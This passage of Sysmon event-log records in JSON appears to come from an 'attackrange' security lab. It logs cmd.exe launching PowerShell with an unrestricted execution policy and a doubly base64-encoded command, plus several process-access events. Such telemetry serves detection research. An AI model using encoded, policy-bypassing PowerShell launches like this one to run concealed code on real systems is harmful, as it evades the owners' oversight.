EIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.820","ProcessGuid":"{A837DB8D-030D-5F25-0000-00108D560600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-030D-5F25-0000-0020B5520600}","LogonId":"0x652b5","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-030D-5F25-0000-0010BE550600}","ParentProcessId":"4980","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4330,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-030D-5F25-0000-0010BE550600}\r\nSourceProcessId: 4980\r\nSourceThreadId: 4700\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-00108D560600}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-030D-5F25-0000-0010BE550600}","SourceProcessId":"4980","SourceThreadId":"4700","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-00108D560600}","TargetProcessId":"4504","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4331,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-00108D560600}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-00108D560600}","TargetProcessId":"4504","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4332,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4333,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.811","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4334,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.811\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 